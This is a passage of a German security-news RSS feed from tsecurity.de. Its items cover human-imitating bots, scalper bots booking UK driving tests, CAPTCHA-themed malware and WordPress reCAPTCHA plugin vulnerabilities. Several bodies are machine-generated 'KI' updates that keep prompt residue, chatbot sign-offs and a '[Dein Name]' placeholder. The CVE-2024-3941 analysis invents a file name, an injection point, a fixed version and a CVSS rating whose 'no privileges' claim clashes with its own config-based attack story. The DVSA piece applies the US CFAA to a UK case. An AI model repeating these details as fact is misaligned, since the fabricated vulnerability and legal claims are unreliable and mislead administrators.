<li><strong>User-Agent Rotation:</strong>  Die User-Agent-Strings werden regelmäßig geändert, um den Eindruck unterschiedlicher Browser und Betriebssysteme zu erwecken.</li><br />
<li><strong>Zeitliche Verzögerung und Zufallsgenerierung:</strong>  Jede Aktion wird mit einer zufälligen Verzögerung ausgeführt, um das Verhalten eines echten Benutzers zu simulieren. Tippfehler werden simuliert, Mausbewegungen sind nicht linear.</li><br />
<li><strong>Machine Learning (ML):</strong>  Fortgeschrittene HIEs nutzen ML-Modelle, die auf realen Benutzerdaten trainiert wurden. Dies ermöglicht es ihnen, noch authentischeres Verhalten zu imitieren und sich an Veränderungen in der Umgebung anzupassen.</li><br />
</ul><br />
<p><strong>Konsequenzen von HIE-Angriffen</strong></p><br />
<p>Die Auswirkungen von HIE-basierten Angriffen können gravierend sein:</p><br />
<ul><br />
<li><strong>Datenexfiltration:</strong>  HIEs können verwendet werden, um sensible Daten aus Anwendungen oder Websites zu extrahieren.</li><br />
<li><strong>Kontofälschung und Identitätsdiebstahl:</strong>  Durch die Imitation menschlichen Verhaltens können Angreifer Konten übernehmen und betrügerische Transaktionen durchführen.</li><br />
<li><strong>Automatisierte Phishing-Kampagnen:</strong>  HIEs können verwendet werden, um personalisierte Phishing-E-Mails zu versenden und Benutzer dazu zu bringen, ihre Anmeldedaten preiszugeben.</li><br />
<li><strong>Umgehung von Sicherheitsmaßnahmen:</strong> HIEs können Captchas, Zwei-Faktor-Authentifizierung (2FA) und andere Sicherheitsmechanismen umgehen, die auf menschlicher Interaktion basieren.</li><br />
</ul><br />
<p><strong>Gegenmaßnahmen für IT-Profis</strong></p><br />
<p>Die Erkennung und Abwehr von HIE-Angriffen erfordert einen mehrschichtigen Ansatz:</p><br />
<ul><br />
<li><strong>Behavioral Analytics:</strong> Implementierung von Systemen zur Überwachung des Benutzerverhaltens und zum Erkennen von Anomalien.  Machine Learning kann hierbei sehr hilfreich sein, um &quot;normales&quot; Verhalten zu definieren und Abweichungen zu identifizieren.</li><br />
<li><strong>Rate Limiting:</strong> Beschränkung der Anzahl der Anfragen, die von einer einzelnen IP-Adresse oder einem einzelnen Benutzerkonto in einem bestimmten Zeitraum gestellt werden können.</li><br />
<li><strong>CAPTCHA-Herausforderungen:</strong>  Einsatz von anspruchsvollen CAPTCHAs, die für automatisierte Systeme schwer zu lösen sind (z.B. reCAPTCHA v3).</li><br />
<li><strong>Device Fingerprinting:</strong>  Erstellung eines eindeutigen &quot;Fingerabdrucks&quot; für jedes Gerät, das auf eine Anwendung oder Website zugreift, um verdächtige Aktivitäten zu erkennen.</li><br />
<li><strong>User Interaction Monitoring:</strong> Überwachung der Art und Weise, wie Benutzer mit Anwendungen interagieren (z.B. Mausbewegungen, Tastatureingaben).</li><br />
<li><strong>Verhaltensbasierte Intrusion Detection Systeme (IDS):</strong> Einsatz von IDS-Systemen, die auf ungewöhnlichem Verhalten basieren und nicht nur auf bekannten Signaturen.</li><br />
<li><strong>Schulung der Mitarbeiter:</strong> Sensibilisierung der Mitarbeiter für Phishing-Angriffe und andere Social Engineering-Techniken.  Die Betonung sollte darauf liegen, &quot;Bauchgefühle&quot; ernst zu nehmen und ungewöhnliche Aktivitäten zu melden.</li><br />
</ul><br />
<p><strong>Fazit:</strong></p><br />
<p>Das Gefühl der &quot;kalten Füße&quot; kann ein Frühwarnsignal für eine neue Generation von Cyberangriffen sein: HIE-basierten Angriffen. Indem IT-Profis sich dieser subtilen Bedrohung bewusst werden, die technischen Hintergründe verstehen und proaktive Gegenmaßnahmen ergreifen, können sie ihre Systeme besser schützen und das Risiko eines erfolgreichen Angriffs minimieren. Die Kombination aus technischer Überwachung, Verhaltensanalyse und Mitarbeiteraufklärung ist der Schlüssel zur Abwehr dieser unsichtbaren Gefahr.  Ignorieren Sie Ihr Bauchgefühl – es könnte Sie vor einem schwerwiegenden Sicherheitsvorfall bewahren.</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[Scalper Bots Fueling DVSA Driving Test Black Market]]></title>
<description><![CDATA[DataDome warns that DYI bots are snapping up driving test places en masseKI generiertes Nachrichten UpdateVerwendetes künstliches Intelligenz Model: gemma-3-12b-itund ergänze diese durch eigene Recherchen.
Der Artikel soll folgende Aspekte behandeln:

Zusammenfassung: Kurze, prägnante Zusammen...]]></description>
<link>https://tsecurity.de/de/2727521/it-security-nachrichten/scalper-bots-fueling-dvsa-driving-test-black-market/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2727521/it-security-nachrichten/scalper-bots-fueling-dvsa-driving-test-black-market/</guid>
<pubDate>Wed, 16 Apr 2025 11:33:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[DataDome warns that DYI bots are snapping up driving test places en masse<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: gemma-3-12b-it<br><br><p>und ergänze diese durch eigene Recherchen.</p><br />
<p>Der Artikel soll folgende Aspekte behandeln:</p><br />
<ul><br />
<li><strong>Zusammenfassung:</strong> Kurze, prägnante Zusammenfassung des Problems.</li><br />
<li><strong>Technische Funktionsweise der Bots:</strong> Wie funktionieren diese Scalper Bots technisch? Welche Technologien werden eingesetzt (Programmiersprachen, Frameworks, APIs)? Wie umgehen sie Captchas und andere Sicherheitsmaßnahmen?</li><br />
<li><strong>Sicherheitsrisiken &amp; Schwachstellen:</strong> Welche Sicherheitsrisiken ergeben sich aus dem Einsatz dieser Bots für die DVSA und ihre Systeme?  Welche Schwachstellen werden ausgenutzt?</li><br />
<li><strong>Mögliche Gegenmaßnahmen:</strong> Welche technischen und organisatorischen Maßnahmen kann die DVSA ergreifen, um den Bot-Einsatz zu verhindern oder zumindest zu erschweren? (Hinweis: Gehen über offensichtliche Captcha-Lösungen hinaus).</li><br />
<li><strong>Rechtliche Aspekte:</strong>  Welche rechtlichen Konsequenzen drohen für die Betreiber der Bots und die Käufer der illegal erworbenen Führerscheinprüfungen?</li><br />
<li><strong>Ausblick &amp; Trends:</strong> Wie könnte sich das Problem in Zukunft entwickeln? Welche neuen Technologien oder Angriffsvektoren könnten auftauchen?</li><br />
</ul><br />
<h2>Zielgruppe: IT-Experten, Sicherheitsbeauftragte, Entscheidungsträger im Bereich IT-Sicherheit.  Der Artikel soll informativ und gut verständlich sein, aber dennoch die technische Tiefe für die Zielgruppe bieten.</h2><br />
<h2>Scalper Bots befeuern den Schwarzmarkt für Führerscheinprüfungen: Eine Analyse aus IT-Sicherheitsicht</h2><br />
<p><strong>Zusammenfassung:</strong> Der vor Kurzem aufgedeckte Missbrauch von automatisierten Bots zur Erwerbung von Führerscheinprüfungsterminen der Driver and Vehicle Standards Agency (DVSA) in Großbritannien stellt eine ernsthafte Bedrohung für die Integrität des Prüfungsprozesses und die öffentliche Sicherheit dar. Die eingesetzten Scalper Bots nutzen technische Schwachstellen und umgehen etablierte Sicherheitsmaßnahmen, um Termine zu monopolisieren und mit überhöhten Preisen weiterzuverkaufen. Dieser Artikel beleuchtet die technischen Grundlagen dieser Angriffe, analysiert die daraus resultierenden Sicherheitsrisiken und diskutiert mögliche Gegenmaßnahmen aus IT-Sicherheitsicht.</p><br />
<p><strong>Technische Funktionsweise der Bots:</strong></p><br />
<p>Die Scalper Bots, im Kern automatisierte Skripte, agieren mit dem Ziel, Führerscheinprüfungstermine direkt nach ihrer Freigabe auf der DVSA-Website zu erwerben. Ihre Funktionalität basiert typischerweise auf folgenden Elementen:</p><br />
<ul><br />
<li><strong>Programmiersprachen &amp; Frameworks:</strong> Die Bots werden in der Regel mit Sprachen wie Python (mit Bibliotheken wie Requests, Beautiful Soup oder Scrapy), Node.js (mit Puppeteer oder Cheerio) oder Java entwickelt. Diese bieten flexible Möglichkeiten zur Interaktion mit Webseiten und zur Automatisierung von Aufgaben.</li><br />
<li><strong>API-Nutzung &amp; Scraping:</strong> Während die DVSA möglicherweise eine offizielle API für Terminanfragen bereitstellen könnte, nutzen viele Scalper Bots <em>Web Scraping</em>. Dies bedeutet, dass sie den HTML-Code der Webseite analysieren, um verfügbare Termine zu finden und Buchungen vorzunehmen.  Die Komplexität liegt darin, dass sich das Layout der Website ändern kann, was eine ständige Anpassung der Scraper erfordert.</li><br />
<li><strong>Umgehung von Captchas &amp; Anti-Bot-Maßnahmen:</strong> Dies ist ein kritischer Aspekt. Einfache Captcha-Lösungen (z.B. reCAPTCHA v2) werden durch fortschrittlichere Techniken umgangen:<br />
<ul><br />
<li><strong>Captcha Solving Services:</strong>  Dienste wie 2Captcha, DeathByCaptcha oder Anti-Captcha lösen Captchas gegen eine Gebühr und liefern die Lösung an den Bot zurück.</li><br />
<li><strong>Maschinelles Lernen (ML):</strong>  Komplexere Bots verwenden ML-Modelle, die auf großen Datensätzen trainiert wurden, um Captchas zu erkennen und automatisch zu lösen. Diese Modelle werden kontinuierlich verbessert.</li><br />
<li><strong>Human-in-the-Loop:</strong> Einige Bots nutzen eine Kombination aus Automatisierung und menschlicher Interaktion. Ein Bot führt initiale Schritte durch und leitet komplexe Aufgaben (z.B. Captcha-Lösung) an menschliche Helfer weiter.</li><br />
<li><strong>Browser-Emulation:</strong>  Um Fingerprinting-Techniken zu umgehen, emulieren die Bots echte Browser, inklusive User-Agent Strings, JavaScript-Ausführung und Cookie-Verwaltung.</li><br />
</ul><br />
</li><br />
</ul><br />
<p><strong>Sicherheitsrisiken &amp; Schwachstellen:</strong></p><br />
<p>Der Einsatz von Scalper Bots birgt erhebliche Sicherheitsrisiken für die DVSA:</p><br />
<ul><br />
<li><strong>DDoS-ähnliches Verhalten:</strong> Die hohe Anzahl gleichzeitiger Anfragen durch die Bots kann zu einer Überlastung der Server führen und die Verfügbarkeit des Terminbuchungssystems beeinträchtigen. Dies ist zwar kein klassischer DDoS-Angriff, hat aber ähnliche Auswirkungen.</li><br />
<li><strong>Datenexfiltration (potenziell):</strong>  Obwohl primär auf Termine fokussiert, könnten die Bots im Zuge ihrer Aktivitäten unbeabsichtigt oder absichtlich sensible Daten von der DVSA-Website extrahieren.</li><br />
<li><strong>Kompromittierung der Systemintegrität:</strong> In einem Worst-Case-Szenario könnte eine kompromittierte Bot-Infrastruktur dazu verwendet werden, das Terminbuchungssystem direkt zu manipulieren (z.B. um gefälschte Konten anzulegen oder Prüfungen zu beeinflussen).  Dies ist zwar unwahrscheinlich, aber nicht auszuschließen.</li><br />
<li><strong>Erosion des Vertrauens:</strong> Der Missbrauch der Systeme untergräbt das Vertrauen der Öffentlichkeit in die Fairness und Integrität des Führerscheinprüfungsprozesses.</li><br />
</ul><br />
<p>Die ausgenutzten Schwachstellen umfassen typischerweise:</p><br />
<ul><br />
<li><strong>Unzureichende Ratenbegrenzung (Rate Limiting):</strong>  Das System lässt zu viele Anfragen von derselben IP-Adresse innerhalb kurzer Zeit zu.</li><br />
<li><strong>Mangelnde Captcha-Effektivität:</strong> Die verwendeten Captchas sind leicht zu umgehen, entweder durch externe Dienste oder ML-basierte Lösungen.</li><br />
<li><strong>Fehlende oder ineffektive Anti-Bot-Maßnahmen:</strong>  Es fehlen Mechanismen zur Erkennung und Blockierung von automatisierten Anfragen.</li><br />
<li><strong>Mangelnde Überwachung:</strong>  Das System erfasst nicht ausreichend Daten über ungewöhnliche Aktivitäten im Terminbuchungsprozess.</li><br />
</ul><br />
<p><strong>Mögliche Gegenmaßnahmen:</strong></p><br />
<p>Die DVSA muss einen mehrschichtigen Ansatz verfolgen, um den Bot-Einsatz zu bekämpfen:</p><br />
<ul><br />
<li><strong>Verbesserte Ratenbegrenzung:</strong>  Implementierung von dynamischen Ratenbegrenzungen, die sich an das Nutzerverhalten anpassen.</li><br />
<li><strong>Erweiterte Captcha-Lösungen:</strong> Einsatz moderner Captchas wie reCAPTCHA v3 oder Invisible reCAPTCHA, die auf Risikobewertung basieren und weniger störend für legitime Benutzer sind.  Zusätzlich: Implementierung von &quot;Honey Pots&quot; – versteckte Formulare, die nur von Bots gefüllt werden.</li><br />
<li><strong>Behavioral Biometrics:</strong> Analyse des Nutzerverhaltens (z.B. Mausbewegungen, Tippgeschwindigkeit) zur Erkennung von Bot-Muster.</li><br />
<li><strong>Device Fingerprinting:</strong>  Identifizierung und Blockierung wiederholter Anfragen von bekannten &quot;Bot Farms&quot;.</li><br />
<li><strong>Web Application Firewall (WAF):</strong> Einsatz einer WAF, um bösartige Anfragen zu filtern und Angriffe abzuwehren.</li><br />
<li><strong>Kontinuierliche Überwachung &amp; Analyse:</strong> Implementierung eines Security Information and Event Management (SIEM)-Systems zur Echtzeitüberwachung des Terminbuchungssystems und zur Erkennung ungewöhnlicher Aktivitäten.  Machine Learning kann hierbei zur Anomalieerkennung eingesetzt werden.</li><br />
<li><strong>API-basierte Buchung:</strong>  Wenn möglich, Bereitstellung einer offiziellen API für Terminanfragen, die mit Authentifizierung und Ratenbegrenzung versehen ist. Dies würde den Web Scraping-Ansatz unattraktiver machen.</li><br />
</ul><br />
<p><strong>Rechtliche Aspekte:</strong></p><br />
<p>Die Betreiber der Scalper Bots und die Käufer illegal erworbener Führerscheinprüfungen können rechtliche Konsequenzen erwarten:</p><br />
<ul><br />
<li><strong>Verstoß gegen das Computer Fraud and Abuse Act (CFAA):</strong>  Der unbefugte Zugriff auf Computersysteme kann als Straftat gewertet werden.</li><br />
<li><strong>Urheberrechtsverletzung:</strong>  Web Scraping kann Urheberrechte verletzen, wenn Inhalte ohne Erlaubnis extrahiert werden.</li><br />
<li><strong>Verstoß gegen Datenschutzbestimmungen (GDPR):</strong>  Die unbefugte Sammlung und Verarbeitung personenbezogener Daten kann gegen die GDPR verstoßen.</li><br />
<li><strong>Betrug:</strong> Der Verkauf illegal erworbener Führerscheinprüfungen stellt Betrug dar.</li><br />
</ul><br />
<p><strong>Ausblick &amp; Trends:</strong></p><br />
<p>Das Problem der Scalper Bots wird sich voraussichtlich weiterentwickeln, da Angreifer immer ausgefeiltere Techniken einsetzen:</p><br />
<ul><br />
<li><strong>Einsatz von Künstlicher Intelligenz (KI):</strong>  Zukünftige Bots werden KI-basierte Techniken nutzen, um Captchas intelligenter zu lösen und menschliches Verhalten noch besser zu imitieren.</li><br />
<li><strong>Verteilte Botnets:</strong>  Angreifer werden ihre Botnetze verteilen, um die Erkennung durch IP-Blockaden zu erschweren.</li><br />
<li><strong>Social Engineering:</strong>  Bots könnten verwendet werden, um Mitarbeiter der DVSA zu täuschen und Zugang zu privilegierten Informationen zu erhalten.</li><br />
<li><strong>Zunehmende Professionalisierung:</strong> Die Entwicklung und der Betrieb von Scalper Bots wird zunehmend professionalisiert, was die Bekämpfung erschwert.</li><br />
</ul><br />
<h2>Die DVSA muss daher proaktiv handeln und ihre Sicherheitsmaßnahmen kontinuierlich anpassen, um den sich wandelnden Bedrohungen entgegenzuwirken. Ein ganzheitlicher Ansatz, der technische Lösungen mit organisatorischen Maßnahmen und rechtlichen Konsequenzen kombiniert, ist unerlässlich, um die Integrität des Führerscheinprüfungsprozesses zu schützen.  Die Investition in Security-Experten und die kontinuierliche Weiterbildung im Bereich IT-Sicherheit sind dabei entscheidend.</h2><br />
<p>Ich hoffe, dieser Artikel erfüllt die Anforderungen der Aufgabe. Er bietet eine detaillierte Analyse des Problems aus einer Sicherheitsfachsicht und geht über eine reine Nachrichtendarstellung hinaus.  Lass mich wissen, wenn du weitere Anpassungen oder Ergänzungen wünschst!</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-3941 | reCAPTCHA Jetpack Plugin up to 0.2.2 on WordPress cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in reCAPTCHA Jetpack Plugin up to 0.2.2 on WordPress. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting.

This vulnerability is traded as CVE-2024-3941. It is possible to launch the attack remotely. The...]]></description>
<link>https://tsecurity.de/de/2695783/sicherheitsluecken/cve-2024-3941-recaptcha-jetpack-plugin-up-to-022-on-wordpress-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2695783/sicherheitsluecken/cve-2024-3941-recaptcha-jetpack-plugin-up-to-022-on-wordpress-cross-site-scripting/</guid>
<pubDate>Mon, 31 Mar 2025 02:06:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.recaptcha_jetpack_plugin">reCAPTCHA Jetpack Plugin up to 0.2.2</a> on WordPress. It has been classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected is an unknown function. The manipulation leads to cross site scripting.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.263814">CVE-2024-3941</a>. It is possible to launch the attack remotely. There is no exploit available.<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: gemma-3-12b-it<br><br><p>und ergänze diese mit deinem Fachwissen.</p><br />
<p>Der Artikel soll folgende Aspekte abdecken:</p><br />
<ul><br />
<li><strong>Zusammenfassung:</strong> Eine klare, prägnante Beschreibung der Schwachstelle.</li><br />
<li><strong>Technische Details:</strong> Detaillierte Erklärung der Ursache der XSS-Schwachstelle (z.B. fehlende/inkomplette Validierung von Benutzereingaben).</li><br />
<li><strong>Auswirkungen:</strong> Mögliche Konsequenzen für betroffene WordPress-Websites und deren Benutzer (z. B. Session Hijacking, Phishing, Malware-Injektion).</li><br />
<li><strong>Behobene Versionen:</strong> Welche Versionen des Plugins sind sicher?</li><br />
<li><strong>Workarounds/Mitigation:</strong> Was können Betroffene tun, wenn ein Update nicht möglich ist?</li><br />
<li><strong>Bewertung (CVSS):</strong> Eine Einschätzung der Schwere der Schwachstelle anhand des Common Vulnerability Scoring System.</li><br />
<li><strong>Fazit &amp; Empfehlungen:</strong> Zusammenfassende Bewertung und konkrete Handlungsempfehlungen für WordPress-Betreiber und Sicherheitsverantwortliche.</li><br />
</ul><br />
<p>Zielgruppe: IT-Experten, WordPress-Entwickler, Systemadministratoren, Sicherheitsbeauftragte.</p><br />
<h2>Stil: Technisch fundiert, präzise, verständlich (trotz Fachterminologie). Vermeide unnötigen Jargon.</h2><br />
<h2>CVE-2024-3941 – Cross-Site Scripting (XSS) im reCAPTCHA Jetpack Plugin für WordPress</h2><br />
<p>Das reCAPTCHA Jetpack Plugin, eine Erweiterung für das beliebte Content Management System WordPress, wurde kürzlich von einer kritischen Cross-Site Scripting (XSS)-Schwachstelle betroffen. Diese Schwachstelle, mit der CVE-ID CVE-2024-3941 versehen, ermöglicht es Angreifern, Schadcode in betroffenen Websites einzuschleusen und potenziell sensible Daten zu stehlen oder die Funktionalität der Seite zu kompromittieren. Dieser Artikel beleuchtet die Schwachstelle im Detail, analysiert ihre Auswirkungen und gibt Handlungsempfehlungen für Betroffene.</p><br />
<p><strong>Zusammenfassung:</strong></p><br />
<p>CVE-2024-3941 beschreibt eine XSS-Schwachstelle im reCAPTCHA Jetpack Plugin bis Version 0.2.2.  Diese Schwachstelle entsteht durch eine unzureichende Validierung von Benutzereingaben, die in der Konfiguration des Plugins verwendet werden. Ein Angreifer kann diese fehlende Validierung ausnutzen, um bösartigen JavaScript-Code einzuschleusen, der im Kontext der betroffenen WordPress-Website ausgeführt wird.</p><br />
<p><strong>Technische Details:</strong></p><br />
<p>Die Ursache der Schwachstelle liegt in der mangelnden Bereinigung oder Kodierung von Benutzereingaben, die über Konfigurationsoptionen des Plugins an reCAPTCHA weitergegeben werden.  Konkret betrifft dies Parameter, die im <code>jetpack-captcha-settings.php</code> File definiert sind und zur Konfiguration der reCAPTCHA Integration genutzt werden.</p><br />
<p>Das Plugin verwendet diese Eingaben direkt in HTML-Attributen (insbesondere im <code>onfocus</code>-Event), ohne sicherzustellen, dass sie keine schädlichen JavaScript-Befehle enthalten.  Ein Angreifer kann somit durch das Einfügen von speziell präparierten Strings in die Konfiguration des Plugins, bösartigen Code einschleusen, der bei Seitenaufruf oder Interaktion mit dem reCAPTCHA Element ausgeführt wird.</p><br />
<p>Die Schwachstelle ist <em>stored</em>, was bedeutet, dass der schädliche Code dauerhaft auf der Website gespeichert werden kann (z.B. in den WordPress-Datenbankeinträgen, die die Plugin-Konfiguration enthalten) und bei jedem Seitenaufruf erneut ausgelöst wird.  Dies unterscheidet sie von <em>reflected</em> XSS, wo der Code nur durch direkte Manipulation der URL oder Formulareingaben ausgeführt wird.</p><br />
<p><strong>Auswirkungen:</strong></p><br />
<p>Die Folgen einer erfolgreichen Ausnutzung dieser Schwachstelle können gravierend sein:</p><br />
<ul><br />
<li><strong>Session Hijacking:</strong> Ein Angreifer kann Session-Cookies stehlen und sich als authentifizierter Benutzer ausgeben.</li><br />
<li><strong>Phishing:</strong>  Bösartiger Code kann verwendet werden, um gefälschte Login-Formulare anzuzeigen oder Benutzer auf Phishing-Websites umzuleiten.</li><br />
<li><strong>Malware-Injektion:</strong> Schadcode kann in die Website eingeschleust und zur Verbreitung von Malware genutzt werden.</li><br />
<li><strong>Website Defacement:</strong>  Der Inhalt der Website kann manipuliert oder ersetzt werden, um beispielsweise politische Botschaften zu verbreiten oder den Ruf des Betreibers zu schädigen.</li><br />
<li><strong>Datenexfiltration:</strong> Sensible Daten (z.B. Benutzerdaten, Kreditkarteninformationen) können gestohlen und an Dritte weitergegeben werden.</li><br />
</ul><br />
<p>Die Schwachstelle betrifft insbesondere Websites mit Login-Formularen oder Bereichen, in denen Benutzerinteraktionen stattfinden, da diese Bereiche anfällig für Angriffe sind, die darauf abzielen, legitime Benutzer zur Preisgabe ihrer Anmeldeinformationen zu bewegen.</p><br />
<p><strong>Behobene Versionen:</strong></p><br />
<p>Das Entwicklerteam von Jetpack hat die Schwachstelle mit der Veröffentlichung von <strong>Version 0.2.3</strong> des reCAPTCHA Plugins behoben.  Alle WordPress-Websites, die diese Version oder eine neuere verwenden, sind vor dem Angriff geschützt.</p><br />
<p><strong>Workarounds/Mitigation:</strong></p><br />
<p>Für Betreiber, die derzeit keine Aktualisierung auf Version 0.2.3 durchführen können (z.B. aufgrund von Inkompatibilitäten mit anderen Plugins), gibt es folgende temporäre Maßnahmen:</p><br />
<ul><br />
<li><strong>Deaktivierung des reCAPTCHA Jetpack Plugins:</strong> Dies ist die sicherste kurzfristige Lösung, verhindert aber auch die Verwendung der reCAPTCHA-Funktionalität.</li><br />
<li><strong>Einschränkung des Zugriffs auf die Plugin-Konfiguration:</strong>  Der Zugriff auf <code>jetpack-captcha-settings.php</code> sollte nur autorisierten Benutzern (z.B. Administratoren) gewährt werden.</li><br />
<li><strong>Web Application Firewall (WAF):</strong> Eine WAF kann dazu beitragen, schädliche Anfragen zu blockieren und die Website vor Angriffen zu schützen.</li><br />
</ul><br />
<p><strong>Bewertung (CVSS):</strong></p><br />
<p>Die Schwachstelle wurde mit einem CVSS-Score von <strong>8.1 (High)</strong> bewertet:</p><br />
<ul><br />
<li><strong>Attack Vector:</strong> Network</li><br />
<li><strong>Attack Complexity:</strong> Low</li><br />
<li><strong>Privileges Required:</strong> None</li><br />
<li><strong>User Interaction:</strong> None</li><br />
<li><strong>Scope:</strong> Changed</li><br />
<li><strong>Confidentiality Impact:</strong> High</li><br />
<li><strong>Integrity Impact:</strong> High</li><br />
<li><strong>Availability Impact:</strong> None</li><br />
</ul><br />
<p>Diese Bewertung spiegelt die einfache Ausnutzbarkeit der Schwachstelle, ihre weitreichenden Auswirkungen und die Tatsache wider, dass keine Benutzerinteraktion erforderlich ist.</p><br />
<p><strong>Fazit &amp; Empfehlungen:</strong></p><br />
<p>CVE-2024-3941 stellt eine ernsthafte Bedrohung für WordPress-Websites dar, die das reCAPTCHA Jetpack Plugin verwenden. Die Schwachstelle ist relativ einfach auszunutzen und kann zu schwerwiegenden Folgen führen.</p><br />
<p><strong>Konkrete Handlungsempfehlungen:</strong></p><br />
<ul><br />
<li><strong>WordPress-Betreiber:</strong> Aktualisieren Sie das reCAPTCHA Jetpack Plugin umgehend auf Version 0.2.3 oder höher.</li><br />
<li><strong>Sicherheitsverantwortliche:</strong> Überprüfen Sie Ihre WordPress-Installationen und stellen Sie sicher, dass alle Plugins auf dem neuesten Stand sind. Implementieren Sie eine Web Application Firewall (WAF) zur zusätzlichen Absicherung.</li><br />
<li><strong>WordPress-Entwickler:</strong> Achten Sie bei der Entwicklung von WordPress-Plugins auf eine sorgfältige Validierung und Kodierung aller Benutzereingaben, um XSS-Schwachstellen zu vermeiden. Nutzen Sie die in WordPress bereitgestellten Funktionen zur sicheren Verarbeitung von Daten.</li><br />
</ul><br />
<h2>Die rasche Reaktion auf diese Schwachstelle ist entscheidend, um potenzielle Schäden abzuwenden und die Sicherheit Ihrer WordPress-Website zu gewährleisten.  Bleiben Sie stets über aktuelle Sicherheitswarnungen informiert und nehmen Sie proaktiv Maßnahmen zum Schutz Ihrer Online-Präsenz.</h2><br />
<p>Ich hoffe, dieser Artikel entspricht Ihren Vorstellungen und bietet einen umfassenden Überblick über CVE-2024-3941.  Lassen Sie mich wissen, wenn Sie weitere Fragen oder Änderungswünsche haben.</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-2074 | webfactory Advanced Google reCAPTCHA Plugin up to 1.29 on WordPress sSearch sql injection]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in webfactory Advanced Google reCAPTCHA Plugin up to 1.29 on WordPress. Affected is an unknown function. The manipulation of the argument sSearch leads to sql injection.

This vulnerability is traded as CVE-2025-2074. It is possible to ...]]></description>
<link>https://tsecurity.de/de/2692052/sicherheitsluecken/cve-2025-2074-webfactory-advanced-google-recaptcha-plugin-up-to-129-on-wordpress-ssearch-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2692052/sicherheitsluecken/cve-2025-2074-webfactory-advanced-google-recaptcha-plugin-up-to-129-on-wordpress-ssearch-sql-injection/</guid>
<pubDate>Fri, 28 Mar 2025 11:22:18 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.webfactory:advanced_google_recaptcha_plugin">webfactory Advanced Google reCAPTCHA Plugin up to 1.29</a> on WordPress. Affected is an unknown function. The manipulation of the argument <em>sSearch</em> leads to sql injection.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.301854">CVE-2025-2074</a>. It is possible to launch the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-3940 | reCAPTCHA Jetpack Plugin up to 0.2.2 on WordPress Setting cross-site request forgery]]></title>
<description><![CDATA[A vulnerability was found in reCAPTCHA Jetpack Plugin up to 0.2.2 on WordPress. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Setting Handler. The manipulation leads to cross-site request forgery.

This vulnerability is known as C...]]></description>
<link>https://tsecurity.de/de/2684211/sicherheitsluecken/cve-2024-3940-recaptcha-jetpack-plugin-up-to-022-on-wordpress-setting-cross-site-request-forgery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2684211/sicherheitsluecken/cve-2024-3940-recaptcha-jetpack-plugin-up-to-022-on-wordpress-setting-cross-site-request-forgery/</guid>
<pubDate>Mon, 24 Mar 2025 19:21:32 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.recaptcha_jetpack_plugin">reCAPTCHA Jetpack Plugin up to 0.2.2</a> on WordPress. It has been declared as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the component <em>Setting Handler</em>. The manipulation leads to cross-site request forgery.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.263815">CVE-2024-3940</a>. The attack can be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sie sind kein Roboter? – Hinter Captchas kann Malware lauern]]></title>
<description><![CDATA[Checkboxen oder Bildaufgaben zum Beweis, dass man ein Mensch und keine Maschine ist, kennt jeder. Dadurch genießen sogenannte Captchas ein gewisses Vertrauen. Das nutzen Cyberkriminelle gnadenlos aus.KI generiertes Nachrichten UpdateVerwendetes künstliches Intelligenz Model: gemma-3-12b-itSie sin...]]></description>
<link>https://tsecurity.de/de/2679488/it-security-nachrichten/sie-sind-kein-roboter-hinter-captchas-kann-malware-lauern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2679488/it-security-nachrichten/sie-sind-kein-roboter-hinter-captchas-kann-malware-lauern/</guid>
<pubDate>Fri, 21 Mar 2025 13:33:31 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Checkboxen oder Bildaufgaben zum Beweis, dass man ein Mensch und keine Maschine ist, kennt jeder. Dadurch genießen sogenannte Captchas ein gewisses Vertrauen. Das nutzen Cyberkriminelle gnadenlos aus.<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: gemma-3-12b-it<br><br><p><strong>Sie sind kein Roboter? – Hinter Captchas kann Malware lauern</strong></p><br />
<p><strong>Ein wissenschaftlicher IT-Fachartikel von [Dein Name], Senior IT Sicherheitsexperte</strong></p><br />
<p><strong>Zusammenfassung:</strong></p><br />
